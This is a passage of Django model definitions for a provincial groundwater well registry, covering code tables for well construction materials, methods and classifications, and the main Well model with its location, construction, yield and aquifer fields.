filter_pack_material_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'filter_pack_material_code'
ordering = ['display_order', 'description']
db_table_comment = ('Materials used in the filter pack, which are placed in the annulus of the well '
'between the borehole wall and the well screen, and are used to settle-out fine '
'grained particles that may otherwise enter the well. I.e. Fine gravel, very coarse '
'sand, very fine gravel, other.')
def __str__(self):
return self.description
class LinerMaterialCode(CodeTableModel):
"""
Liner material installed in a well to protect the well pump or other works in the well from damage.
"""
code = models.CharField(
primary_key=True, max_length=10, editable=False, db_column='liner_material_code')
description = models.CharField(max_length=100)
class Meta:
db_table = 'liner_material_code'
ordering = ['display_order', 'description']
db_table_comment = ('Describes the material of the piping or tubing installed in a well which protects '
'the well pump or other works in the well from damage. i.e. PVC, Other')
def __str__(self):
return self.description
class SurfaceSealMethodCode(CodeTableModel):
"""
Method used to install the surface seal in the annular space around the outside of the outermost casing
and between mulitple casings of a well.
"""
surface_seal_method_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'surface_seal_method_code'
ordering = ['display_order', 'description']
db_table_comment = ('Valid methods used to create the surface seal for a well. i.e. Poured, Pumped,'
' Other.')
def __str__(self):
return self.description
class SurfaceSealMaterialCode(CodeTableModel):
"""
Sealant material used that is installed in the annular space around the outside of the outermost casing
and between multiple casings of a well.
"""
surface_seal_material_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'surface_seal_material_code'
ordering = ['display_order', 'description']
db_table_comment = ('Valid materials used for creating the surface seal for a well. A surface seal is a'
' plug that prevents surface runoff from getting into the aquifer or well and'
' contaminating the water. E.g. Bentonite clay, Concrete grout, Sand cement grout,'
' Other.')
def __str__(self):
return self.description
class DrillingMethodCode(CodeTableModel):
"""
The method used to drill a well. For example, air rotary, dual rotary, cable tool, excavating, other.
"""
drilling_method_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'drilling_method_code'
ordering = ['display_order', 'description']
db_table_comment = ('Represents the method that was used to drill or construct a well. E.g. Excavated, '
'Dual Rotary, Driving, Other, Unknown.')
def __str__(self):
return self.description
class LandDistrictCode(CodeTableModel):
"""
Lookup of Legal Land Districts.
"""
land_district_code = models.CharField(
primary_key=True, max_length=10, editable=False)
name = models.CharField(max_length=255)
class Meta:
db_table = 'land_district_code'
ordering = ['display_order', 'name']
def __str__(self):
return self.name
db_table_comment = ('Legal Land District used to help identify the property where the well is located. '
'E.g. Alberni, Barclay, Cariboo.')
class LicencedStatusCode(CodeTableModel):
"""
LicencedStatusCode of Well.
"""
licenced_status_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(
max_length=255,
verbose_name='Licence Status')
class Meta:
db_table = 'licenced_status_code'
ordering = ['display_order', 'licenced_status_code']
db_table_comment = ('Valid licencing options granted to a well under the Water Water Sustainability '
'Act. This information comes from eLicensing. i.e. Unlicensed, Licensed, Historical')
db_column_supplemental_comments = {
"description":"Descriptions of valid licensing options granted to a well under the Water Sustainability Act. This information comes from eLicensing. i.e. Unlicensed, Licensed, Historical",
"licenced_status_code":"Valid licensing options granted to a well under the Water Sustainability Act. This information comes from eLicensing. i.e. Unlicensed, Licensed, Historical.",
}
def save(self, *args, **kwargs):
self.validate()
super(LicencedStatusCode, self).save(*args, **kwargs)
class IntendedWaterUseCode(CodeTableModel):
"""
Usage of Wells (water supply).
"""
intended_water_use_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(
max_length=100,
verbose_name='Intented Water Use')
class Meta:
db_table = 'intended_water_use_code'
ordering = ['display_order', 'description']
db_table_comment = ('The intended use of the water in a water supply well as reported by the driller at '
'time of work completion on the well. E.g Private domestic, irrigation, water '
'supply system, Industrial commercial, and unknown.')
db_column_supplemental_comments = {
"description":"The intended use of the water in a water supply well as reported by the driller at time of work completion on the well. E.g Private Domestic, Irrigation, Water Supply System, Commercial and Industrial, Unknown, Other",
"intended_water_use_code":"The intended use of the water in a water supply well as reported by the driller at time of work completion on the well. E.g, DOM, IRR, DWS, COM, UNK, OTHER",
}
def __str__(self):
return self.description
class GroundElevationMethodCode(CodeTableModel):
"""
The method used to determine the ground elevation of a well.
Some examples of methods to determine ground elevation include:
GPS, Altimeter, Differential GPS, Level, 1:50,000 map, 1:20,000 map, 1:10,000 map, 1:5,000 map.
"""
ground_elevation_method_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'ground_elevation_method_code'
ordering = ['display_order', 'description']
db_table_comment = ('Method used to determine the ground elevation of a well. E.g. GPS, Altimeter, '
'Differential GPS, Level, 1:50,000 map, 1:20,000 map.')
def __str__(self):
return self.description
class WellClassCode(CodeTableModel):
"""
Class of Well type.
"""
well_class_code = models.CharField(
primary_key=True, max_length=10, editable=False,
db_comment=('Valid classifications as defined in the Groundwater Protection Regulation of the'
' Water Act. i.e. Water Supply, Monitoring, Recharge, Injection, Dewatering,'
' Drainage, Remediation, Geotechnical, Closed-loop geoexchange.'))
description = models.CharField(
max_length=100, verbose_name='Well Class',
db_comment=('Descriptions of valid classifications as defined in the Groundwater Protection'
' Regulation of the Water Act. E.g. Water Supply, Monitoring, Recharge / Injection,'
' Dewatering / Drainage, Remediation, Geotechnical.'))
class Meta:
db_table = 'well_class_code'
ordering = ['display_order', 'description']
db_table_comment = ('Valid classifications as defined in the Groundwater Protection Regulation of the'
' Water Sustainability Act. E.g. Water Supply, Monitoring, Recharge / Injection,'
' Dewatering / Drainage, Remediation, Geotechnical.')
db_column_supplemental_comments = {
"description":"Descriptions of valid classifications as defined in the Groundwater Protection Regulation of the Water Sustainability Act. E.g. Water Supply, Monitoring, Recharge / Injection, Dewatering / Drainage, Remediation, Geotechnical.",
"well_class_code":"Valid classifications as defined in the Groundwater Protection Regulation of the Water Sustainability Act. i.e. Unknown, Water Supply, Monitoring, Recharge, Injection, Dewatering, Drainage, Remediation, Geotechnical, Closed-loop geoexchange.",
}
def __str__(self):
return self.description
class WellStatusCodeTypeManager(models.Manager):
"""
Provides additional methods for returning well status codes that correspond
to activity submissions
"""
# Construction reports correspond to "NEW" status
def construction(self):
return self.get_queryset().get(well_status_code=WELL_STATUS_CODE_CONSTRUCTION)
# Decommission reports trigger a "CLOSURE" status
def decommission(self):
return self.get_queryset().get(well_status_code=WELL_STATUS_CODE_DECOMMISSION)
# Alteration reports trigger an "ALTERATION" status
def alteration(self):
return self.get_queryset().get(well_status_code=WELL_STATUS_CODE_ALTERATION)
def other(self):
return self.get_queryset().get(well_status_code=WELL_STATUS_CODE_OTHER)
class WellStatusCode(CodeTableModel):
"""
Well Status.
"""
well_status_code = models.CharField(
primary_key=True, max_length=10, editable=False,
db_comment=('Status of a well indicates whether the report relates to the construction,'
' alteration, or decommission of the well; e.g., Construction, Alteration,'
' Abandoned, Deccommission.'))
description = models.CharField(
max_length=255,
verbose_name='Well Status',
db_comment=('Description of the status of a well as defined in the Groundwater Protection Regulation of the Water Sustainability Act. i.e. New, Abandoned (exists in Wells but will not be used for E-Wells), Alteration, Closure, Other.'))
objects = models.Manager()
types = WellStatusCodeTypeManager()
class Meta:
db_table = 'well_status_code'
ordering = ['display_order', 'well_status_code']
db_table_comment = ('Status of a well indicates whether the report relates to the construction,'
' alteration, or decommission of the well; e.g., Construction, alteration,'
' Abandoned, Deccommission.')
class WellPublicationStatusCode(CodeTableModel):
"""
Well Publication Status.
"""
well_publication_status_code = models.CharField(
primary_key=True, max_length=20, editable=False, null=False)
description = models.CharField(max_length=255, null=False)
class Meta:
db_table = 'well_publication_status_code'
ordering = ['display_order', 'well_publication_status_code']
class WellSubclassCode(CodeTableModel):
"""
Subclass of Well type; we use GUID here as Django doesn't support multi-column PK's
"""
well_subclass_guid = models.UUIDField(
primary_key=True, default=uuid.uuid4, editable=False)
well_class = models.ForeignKey(
WellClassCode, null=True, db_column='well_class_code',
on_delete=models.PROTECT, blank=True,
db_comment=('Valid classifications as defined in the Groundwater Protection Regulation of the Water Sustainability Act. i.e. Water Supply, Monitoring, Recharge, Injection, Dewatering, Drainage, Remediation, Geotechnical, Closed-loop geoexchange.'))
well_subclass_code = models.CharField(max_length=10)
description = models.CharField(max_length=100)
class Meta:
db_table = 'well_subclass_code'
ordering = ['display_order', 'description']
db_table_comment = ('Valid methods used to further classify a well within the main classification'
' (well_class_code). It provides for a standard commonly understood code and'
' description for well sub-classifcation as defined in the Groundwater Protection'
' Regulation of the Water Act . i.e. Domestic, Borehole, Closed Loop Geothermal,'
' Non-domestic,Permanent, Special, Temporary, Test Pit.')
def validate_unique(self, exclude=None):
qs = Room.objects.filter(name=self.well_subclass_code)
if qs.filter(well_class__well_class_code=self.well_class__well_class_code).exists():
raise ValidationError('Code must be unique per Well Class')
def save(self, *args, **kwargs):
self.validate_unique()
super(WellSubclassCode, self).save(*args, **kwargs)
def __str__(self):
return self.description
class WellYieldUnitCode(CodeTableModel):
"""
Units of Well Yield.
"""
well_yield_unit_code = models.CharField(
primary_key=True, max_length=10, editable=False,
db_comment=('ASK DEVELOPER S TO DELETE THIS COLUMN once the \'yield\' column has been all'
' converted to USGPM. Describes the unit of measure that was used for the well'
' yield. All Code except the U.S. Gallons per Minute has been retired as all data'
' from April 2019 will be reported in USGPM. E.g of other Code that have been used'
' in the past are GPM, DRY, UNK.'))
description = models.CharField(
max_length=100, verbose_name='Well Yield Unit',
db_comment=('Describes the unit of measure that was used for the well yield. All codes except'
' the U.S. Gallons per Minute has been retired as all data from April 2019 will be'
' reported in U.S. Gallons per Minute. E.g of other codes that have been used in the'
' past are Gallons per Minute (U.S./Imperial), Dry Hole, Unknown Yield.'))
class Meta:
db_table = 'well_yield_unit_code'
ordering = ['display_order', 'description']
db_table_comment = ('Describes the unit of measure that was used for the well yield. All codes except'
' the U.S. Gallons per Minute has been retired as all data from April 2019 will be'
' reported in U.S. Gallons per Minute. E.g of other codes that have been used in the'
' past are Gallons per Minute (U.S./Imperial), Dry Hole, Unknown Yield.')
def __str__(self):
return self.description
class CoordinateAcquisitionCode(BasicCodeTableModel):
"""
• A = (10 m accuracy) ICF cadastre and good location sketch
• B = (20 m accuracy) Digitized from 1:5,000 mapping
• C = (50 m accuracy) Digitized from 1:20,000 mapping
• D = (100 m accuracy) Digitized from old Dept. of Lands, Forests and Water Resources maps
• E = (200 m accuracy) Digitized from 1:50,000 maps
• F = (1 m accuracy) CDGPS
• G = (unknown, accuracy based on parcel size) No ICF cadastre, poor or no location sketch; site
located in center of primary parcel
• H = (10 m accuracy) Handheld GPS with accuracy of +/- 10 metres
• I = (20 m accuracy) No ICF cadastre but good location sketch or good written description
• J = (unknown, accuracy based on parcel size) ICF cadastre, poor or no location sketch, arbitrarily
located in center of parcel
"""
code = models.CharField(
primary_key=True, max_length=1, editable=False,
db_column='coordinate_acquisition_code',
db_comment=('Codes for the accuracy of the coordinate position, which is best estimated based on'
' the information provided by the data submitter and analysis done by staff. E.g. A,'
' B, C.'))
description = models.CharField(
max_length=250,
db_comment=('A description of the coordinate_aquisition_code. It describes how accurate the coordinate position is estimated based on the information provided by the data submitter and analysis done by staff. E.g. (10 m accuracy) ICF cadastre and good location sketch, (200 m accuracy) Digitized from 1:50,000 mapping, (unknown, accuracy based on parcel size) ICF cadastre, poor or no location sketch, arbitraily located in center of parcel.'))
class Meta:
db_table = 'coordinate_acquisition_code'
ordering = ['code', ]
db_table_comment = ('A description of how accurate the coordinate position is best estimated to be based'
' on the information provided by the data submitter and analysis done by staff. E.g.'
' (10 m accuracy) ICF cadastre and good location sketch, (200 m accuracy) Digitized'
' from 1:50,000 mapping, (unknown, accuracy based on parcel size) ICF cadastre, poor'
' or no location sketch, arbitraily located in center of parcel.')
def __str__(self):
return self.description
class AquiferLithologyCode(CodeTableModel):
"""
Choices for describing Completed Aquifer Lithology
"""
aquifer_lithology_code = models.CharField(primary_key=True, max_length=100,
db_column='aquifer_lithology_code')
description = models.CharField(max_length=100)
class Meta:
db_table = 'aquifer_lithology_code'
ordering = ['display_order', 'aquifer_lithology_code']
verbose_name_plural = 'Aquifer Lithology Codes'
def __str__(self):
return '{} - {}'.format(self.aquifer_lithology_code, self.description)
# TODO: Consider having Well and Submission extend off a common base class, given that
# they mostly have the exact same fields!
@reversion.register()
class Well(AuditModelStructure):
"""
Well information.
"""
well_guid = models.UUIDField(
primary_key=False, default=uuid.uuid4, editable=False)
well_tag_number = models.AutoField(
primary_key=True, verbose_name='Well Tag Number',
db_comment=('The file number assigned to a particular well in the in the province\'s Groundwater '
'Wells and Aquifers application.'))
identification_plate_number = models.PositiveIntegerField(
unique=True, blank=True, null=True, verbose_name="Well Identification Plate Number",
db_comment=('Steel plate with a unique number that is attached to required wells under the '
'groundwater protection regulations such as water supply wells, recharge or injection '
'wells made by drilling or boring, and permanent dewatering wells.'))
owner_full_name = models.CharField(
max_length=200, verbose_name='Owner Name')
owner_mailing_address = models.CharField(
max_length=100, verbose_name='Mailing Address')
owner_city = models.CharField(max_length=100, verbose_name='Town/City', blank=True, null=True)
owner_province_state = models.ForeignKey(
ProvinceStateCode, db_column='province_state_code', on_delete=models.PROTECT, blank=True,
verbose_name='Province', null=True)
owner_postal_code = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Postal Code')
owner_email = models.EmailField(
null=True, blank=True, verbose_name='Email address')
owner_tel = models.CharField(
null=True, blank=True, max_length=25, verbose_name='Telephone number')
well_class = models.ForeignKey(
WellClassCode, db_column='well_class_code', blank=True, null=False, default='UNK',
on_delete=models.PROTECT, verbose_name='Well Class',
db_comment=('Valid classifications as defined in the Groundwater Protection Regulation of the'
' Water Act. i.e. Water Supply, Monitoring, Recharge, Injection, Dewatering,'
' Drainage, Remediation, Geotechnical, Closed-loop geoexchange.'))
well_subclass = models.ForeignKey(WellSubclassCode, db_column='well_subclass_guid',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Well Subclass')
intended_water_use = models.ForeignKey(
IntendedWaterUseCode, db_column='intended_water_use_code',
on_delete=models.PROTECT, blank=True, null=False, default='NA',
verbose_name='Intended Water Use',
db_comment=('The intended use of the water in a water supply well as reported by the driller at'
' time of work completion on the well. E.g DOM, IRR, DWS, COM'))
well_status = models.ForeignKey(
WellStatusCode, db_column='well_status_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Well Status',
db_comment=('Status of a well indicates whether the report relates to the construction,'
' alteration, or decommission of the well; e.g., Construction, Alteration,'
' Abandoned, Deccommission.'))
well_publication_status = models.ForeignKey(WellPublicationStatusCode,
db_column='well_publication_status_code',
on_delete=models.PROTECT,
verbose_name='Well Publication Status',
default='Published')
licences = models.ManyToManyField('aquifers.WaterRightsLicence')
street_address = models.CharField(
max_length=100, blank=True, null=True, verbose_name='Street Address',
db_comment='Street address for where the property that the well is physically located on.')
city = models.CharField(
max_length=50, blank=True, null=True,
verbose_name='Town/City',
db_comment='The city or town in which the well is located as part of the well location address.')
legal_lot = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Lot')
legal_plan = models.CharField(
max_length=20, blank=True, null=True, verbose_name='Plan')
legal_district_lot = models.CharField(
max_length=20, blank=True, null=True, verbose_name='District Lot')
legal_block = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Block')
legal_section = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Section')
legal_township = models.CharField(
max_length=20, blank=True, null=True, verbose_name='Township')
legal_range = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Range')
land_district = models.ForeignKey(LandDistrictCode, db_column='land_district_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Land District')
legal_pid = models.PositiveIntegerField(blank=True, null=True,
verbose_name='Property Identification Description (PID)')
well_location_description = models.CharField(
max_length=500, blank=True, null=True, verbose_name='Description of Well Location',
db_comment=('Descriptive details of a well\'s location. E.g. the well is located 20\' south west of '
'the house; or the well is located in the pump house near the pond.'))
construction_start_date = models.DateField(
null=True, verbose_name='Construction Start Date',
db_comment='The date when well construction started.')
construction_end_date = models.DateField(
null=True, verbose_name='Construction Date',
db_comment='The date when well construction ended.')
alteration_start_date = models.DateField(
null=True, verbose_name='Alteration Start Date',
db_comment='The date when the alteration on a well started.')
alteration_end_date = models.DateField(
null=True, verbose_name='Alteration Date',
db_comment='The date when the alteration on a well was ended.')
decommission_start_date = models.DateField(
null=True, verbose_name='Decommission Start Date',
db_comment='The start date of when the well was decommissioned.')
decommission_end_date = models.DateField(
null=True, verbose_name='Decommission Date')
well_identification_plate_attached = models.CharField(
max_length=500, blank=True, null=True, verbose_name='Well Identification Plate Is Attached',
db_comment=('Description of where the well identification plate has been attached on or near the '
'well.'))
id_plate_attached_by = models.CharField(
max_length=100, blank=True, null=True, verbose_name='Well identification plate attached by')
# Contains Well Longitude and Latitude in that order,
# Values are BC Albers. but we are using WGS84 Lat Lon to avoid rounding errors
geom = models.PointField(
blank=True, null=True, verbose_name='Geo-referenced Location of the Well', srid=4326)
ground_elevation = models.DecimalField(
max_digits=10, decimal_places=2, blank=True, null=True, verbose_name='Ground Elevation')
ground_elevation_method = models.ForeignKey(GroundElevationMethodCode,
db_column='ground_elevation_method_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Elevation Determined By')
drilling_methods = models.ManyToManyField(DrillingMethodCode, verbose_name='Drilling Methods',
blank=True)
well_orientation = models.BooleanField(default=True, verbose_name='Orientation of Well', choices=(
(True, 'vertical'), (False, 'horizontal')))
well_orientation_status = models.ForeignKey(WellOrientationCode, db_column='well_orientation_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Well Orientation Code')
surface_seal_material = models.ForeignKey(SurfaceSealMaterialCode, db_column='surface_seal_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Surface Seal Material')
surface_seal_depth = models.DecimalField(
max_digits=5, decimal_places=2, blank=True, null=True, verbose_name='Surface Seal Depth')
surface_seal_thickness = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Surface Seal Thickness')
surface_seal_method = models.ForeignKey(SurfaceSealMethodCode, db_column='surface_seal_method_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Surface Seal Installation Method')
backfill_type = models.CharField(
max_length=250, blank=True, null=True, verbose_name='Backfill Material Above Surface Seal',
db_comment=('Indicates the type of backfill material that is placed above the surface seal'
' during the construction or alteration of well.'))
backfill_depth = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Backfill Depth',
db_comment='The depth in feet of any backfill placed above the surface seal of a well.')
liner_material = models.ForeignKey(LinerMaterialCode, db_column='liner_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Liner Material')
liner_diameter = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Liner Diameter',
validators=[MinValueValidator(Decimal('0.00'))])
liner_thickness = models.DecimalField(max_digits=5, decimal_places=3, blank=True, null=True,
verbose_name='Liner Thickness',
validators=[MinValueValidator(Decimal('0.00'))])
liner_from = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Liner From',
validators=[MinValueValidator(Decimal('0.00'))])
liner_to = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Liner To', validators=[MinValueValidator(Decimal('0.01'))])
screen_intake_method = models.ForeignKey(ScreenIntakeMethodCode, db_column='screen_intake_method_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Intake Method')
screen_type = models.ForeignKey(ScreenTypeCode, db_column='screen_type_code',
on_delete=models.PROTECT, blank=True, null=True, verbose_name='Type')
screen_material = models.ForeignKey(ScreenMaterialCode, db_column='screen_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Material')
other_screen_material = models.CharField(
max_length=50, blank=True, null=True, verbose_name='Specify Other Screen Material')
screen_opening = models.ForeignKey(ScreenOpeningCode, db_column='screen_opening_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Opening')
screen_bottom = models.ForeignKey(ScreenBottomCode, db_column='screen_bottom_code',
on_delete=models.PROTECT, blank=True, null=True, verbose_name='Bottom')
other_screen_bottom = models.CharField(
max_length=50, blank=True, null=True, verbose_name='Specify Other Screen Bottom')
screen_information = models.CharField(
max_length=300, blank=True, null=True, verbose_name="Screen Information"
)
filter_pack_from = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Filter Pack From',
validators=[MinValueValidator(Decimal('0.00'))])
filter_pack_to = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Filter Pack To',
validators=[MinValueValidator(Decimal('0.01'))])
filter_pack_thickness = models.DecimalField(max_digits=5, decimal_places=3, blank=True, null=True,
verbose_name='Filter Pack Thickness',
validators=[MinValueValidator(Decimal('0.00'))])
filter_pack_material = models.ForeignKey(FilterPackMaterialCode, db_column='filter_pack_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Filter Pack Material')
filter_pack_material_size = models.ForeignKey(FilterPackMaterialSizeCode,
db_column='filter_pack_material_size_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Filter Pack Material Size')
development_methods = models.ManyToManyField(DevelopmentMethodCode, blank=True,
verbose_name='Development Methods')
development_hours = models.DecimalField(max_digits=9, decimal_places=2, blank=True, null=True,
verbose_name='Development Total Duration',
validators=[MinValueValidator(Decimal('0.00'))])
development_notes = models.CharField(
max_length=255, blank=True, null=True, verbose_name='Development Notes')
water_quality_characteristics = models.ManyToManyField(
WaterQualityCharacteristic, db_table='well_water_quality', blank=True,
verbose_name='Obvious Water Quality Characteristics')
water_quality_colour = models.CharField(
max_length=60, blank=True, null=True, verbose_name='Water Quality Colour')
water_quality_odour = models.CharField(
max_length=60, blank=True, null=True, verbose_name='Water Quality Odour')
total_depth_drilled = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Total Depth Drilled')
finished_well_depth = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Finished Well Depth',
db_comment=('The depth at which the well was \'finished\'. It can be shallower from the total well '
'depth which is the total depth at which the well was drilled. The finished depth is '
'represented in units of feet bgl (below ground level).'))
final_casing_stick_up = models.DecimalField(
max_digits=6, decimal_places=3, blank=True, null=True, verbose_name='Final Casing Stick Up')
bedrock_depth = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Depth to Bedrock',
db_comment='Depth below ground level at which bedrock starts, measured in feet.')
water_supply_system_name = models.CharField(
max_length=80, blank=True, null=True, verbose_name='Water Supply System Name',
db_comment=('Name or identifier given to a well that serves as a water supply system. '
'Often, the name is a reflection of the community or system it serves; e.g. Town of '
'Osoyoos or Keremeos Irrigation District.'))
water_supply_system_well_name = models.CharField(
max_length=80, blank=True, null=True, verbose_name='Water Supply System Well Name',
db_comment=('The specific name given to a water supply system well. Often, the name reflects which '
'well it is within the system, e.g. Well 1 or South Well'))
static_water_level = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Static Water Level (BTOC)',
db_comment='The level (depth below ground) to which water will naturally rise in a well without '
'pumping, measured in feet.')
well_yield = models.DecimalField(
max_digits=8, decimal_places=3, blank=True, null=True, verbose_name='Estimated Well Yield',
db_comment=('An approximate estimate of the capacity of the well to produce groundwater. Estimated '
'by the well driller during construction by conducting a well yield test. Measured in US '
'Gallons/minute.'))
artesian_flow = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Artesian Flow',
db_comment=('Measurement of the artesian well\'s water flow that occurs naturally due to inherent'
' water pressure in the well. Pressure within the aquifer forces the groundwater to rise'
' above the land surface naturally without using a pump. Flowing artesian wells can flow'
' on an intermittent or continuous basis. Measured in US Gallons/minute.'))
artesian_pressure = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Artesian Pressure',
db_comment=('Pressure of the water coming out of an artesian well as measured at the time of '
'construction. Measured in PSI (pounds per square inch).'))
artesian_pressure_head = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Artesian Pressure head',
db_comment=('Pressure of the water coming out of an artesian well as measured at the time of '
'construction. Measured in ft agl (feet above ground level).'))
artesian_conditions = models.BooleanField(default=False, verbose_name='Artesian Conditions',
db_comment=('Artesian conditions arise when there is a movement of '
'groundwater from a recharge area under a confining '
'formation to a point of discharge at a lower elevation. '
'An example of this is a natural spring, or in the '
'example of the drilling industry, a flowing water well.'))
well_cap_type = models.CharField(
max_length=40, blank=True, null=True, verbose_name='Well Cap')
well_disinfected = models.BooleanField(
default=False, verbose_name='Well Disinfected', choices=((False, 'No'), (True, 'Yes')))
well_disinfected_status = models.ForeignKey(WellDisinfectedCode, db_column='well_disinfected_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Well Disinfected Code')
comments = models.CharField(
max_length=3000, blank=True, null=True,
db_comment=('Free form text used by the user (driller or staff) to include comments for the well.'
' Investiate how staff/developer comments are put in here from activity submission.'))
internal_comments = models.CharField(
max_length=3000, blank=True, null=True)
alternative_specs_submitted = models.BooleanField(
default=False,
verbose_name='Alternative specs submitted (if required)',
choices=((False, 'No'), (True, 'Yes')),
db_comment=('Indicates if an alternative specification was used for siting of a water supply'
' well, or a permanent dewatering well, or for the method used for decommissioning a'
' well.'))
well_yield_unit = models.ForeignKey(
WellYieldUnitCode, db_column='well_yield_unit_code', on_delete=models.PROTECT, blank=True, null=True)
# want to be integer in future
diameter = models.CharField(max_length=9, blank=True)
observation_well_number = models.CharField(
max_length=30, blank=True, null=True, verbose_name="Observation Well Number",
db_comment=('A unique number assigned to a well that has been included as part '
'of the Provincial Groundwater Observation Well Network, e.g., 406.'))
observation_well_status = models.ForeignKey(
ObsWellStatusCode, db_column='obs_well_status_code', blank=True, null=True,
verbose_name="Observation Well Status", on_delete=models.PROTECT,
db_comment=('Status of an observation well within the Provincial Groundwater Observation Well '
'Network, i.e. Active (a well that is currently being used to collect '
'groundwater information), Inactive (a well that is no longer being used to '
'collect groundwater information).'))
ems = models.CharField(max_length=10, blank=True, null=True,
verbose_name="Environmental Monitoring System (EMS) ID")
utm_zone_code = models.CharField(
max_length=10, blank=True, null=True, verbose_name="Zone")
utm_northing = models.IntegerField(
blank=True, null=True, verbose_name="UTM Northing")
utm_easting = models.IntegerField(
blank=True, null=True, verbose_name="UTM Easting")
coordinate_acquisition_code = models.ForeignKey(
CoordinateAcquisitionCode, default='H', blank=True, null=True, verbose_name="Location Accuracy Code",
db_column='coordinate_acquisition_code', on_delete=models.PROTECT,
db_comment=('Codes for the accuracy of the coordinate position, which is best estimated based on'
' the information provided by the data submitter and analysis done by staff. E.g. A,'
' B, C.'))
bcgs_id = models.ForeignKey(BCGS_Numbers, db_column='bcgs_id', on_delete=models.PROTECT, blank=True,
null=True, verbose_name="BCGS Mapsheet Number")
decommission_reason = models.CharField(
max_length=250, blank=True, null=True, verbose_name="Reason for Decommission")
decommission_method = models.ForeignKey(
DecommissionMethodCode, db_column='decommission_method_code', blank=True, null="True",
verbose_name="Method of Decommission", on_delete=models.PROTECT,
db_comment='Valid code for the method used to fill the well to close it permanently.')
decommission_sealant_material = models.CharField(
max_length=100, blank=True, null=True, verbose_name="Decommission Sealant Material")
decommission_backfill_material = models.CharField(
max_length=100, blank=True, null=True, verbose_name="Decommission Backfill Material")
decommission_details = models.CharField(
max_length=250, blank=True, null=True, verbose_name="Decommission Details")
aquifer = models.ForeignKey(
'aquifers.Aquifer', db_column='aquifer_id', on_delete=models.PROTECT, blank=True,
null=True, verbose_name='Aquifer ID Number',
db_comment=('System generated unique sequential number assigned to each mapped aquifer. The'
' aquifer_id identifies which aquifer a well is in. An aquifer can have multiple'
' wells, while a single well can only be in one aquifer.'))
person_responsible = models.ForeignKey('registries.Person', db_column='person_responsible_guid',
on_delete=models.PROTECT,
verbose_name='Person Responsible for Drilling',
null=True, blank=True)
company_of_person_responsible = models.ForeignKey(
'registries.Organization', db_column='org_of_person_responsible_guid', on_delete=models.PROTECT,
verbose_name='Company of person responsible for drilling', null=True, blank=True)
driller_name = models.CharField(
max_length=200, blank=True, null=True, verbose_name='Name of Person Who Did the Work')
consultant_name = models.CharField(
max_length=200, blank=True, null=True, verbose_name='Consultant Name',
db_comment=('Name of consultant (person) that was involved in the construction, alteration, or'
' decommision of a well.'))
consultant_company = models.CharField(
max_length=200, blank=True, null=True, verbose_name='Consultant Company',
db_comment=('Name of consultant company that was involved in the construction, alteration, or'
' decommision of a well.'))
# Aquifer related data
aquifer_vulnerability_index = models.DecimalField(
max_digits=10, decimal_places=0, blank=True, null=True, verbose_name='AVI',
db_comment=('Valid codes that Indicate the aquifer’s relative intrinsic vulnerability to impacts'
' from human activities at the land surface. Vulnerability is based on: the type,'
' thickness, and extent of geologic materials above the aquifer, depth to water'
' table (or to top of confined aquifer), and type of aquifer materials. E.g. H, L, M'))
storativity = models.DecimalField(
max_digits=8, decimal_places=7, blank=True, null=True, verbose_name='Storativity')
transmissivity = models.DecimalField(
max_digits=30, decimal_places=10, blank=True, null=True, verbose_name='Transmissivity')
hydraulic_conductivity = models.TextField(
max_length=100,
blank=True,
null=True,
verbose_name='Hydraulic Conductivity')
specific_storage = models.TextField(
max_length=100,
blank=True,
null=True,
verbose_name='Specific Storage')
specific_yield = models.DecimalField(
max_digits=5, decimal_places=2, blank=True, null=True, verbose_name='Specific Yield')
testing_method = models.TextField(
max_length=100,
blank=True,
null=True,
verbose_name='Testing Method')
testing_duration = models.PositiveIntegerField(blank=True, null=True)
analytic_solution_type = models.DecimalField(
max_digits=5, decimal_places=2, blank=True, null=True, verbose_name='Analytic Solution Type',
